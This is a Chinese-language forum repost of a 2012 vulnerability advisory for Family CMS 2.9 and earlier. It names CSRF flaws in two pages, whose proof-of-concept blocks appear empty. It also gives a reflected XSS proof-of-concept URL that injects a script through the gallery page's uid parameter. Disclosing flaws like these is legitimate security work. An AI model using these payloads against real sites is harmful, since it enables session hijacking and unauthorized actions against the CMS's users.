首页 › 网安技术 › Family CMS 2.9及更早版本的多个缺陷及修复

wanghe513120 发表于 2012-6-26 12:59:44

Family CMS 2.9及更早版本的多个缺陷及修复

标题: Family CMS 2.9 and earlier multiple Vulnerabilities
下载地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download
作者: Ahmed Elhady Mohamed www.2cto.com ahmed.elhady.mohamed@gmail.com
影响版本: 2.9
测试系统平台: ubuntu 11.4
===================================================================================
提示:
*****First we must install all optional sections during installation process.*****
1- CSRF缺陷 :
POC 1: Page "familynews.php"













--------------------------------------------------------------------------------------------------------
POC 2:页面 "prayers.php"













----------------------------------------------------------------------------------------------------------------------------
2-反射型 XSS
POC : http:///fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
修复：加强过滤和验证

查看完整版本: Family CMS 2.9及更早版本的多个缺陷及修复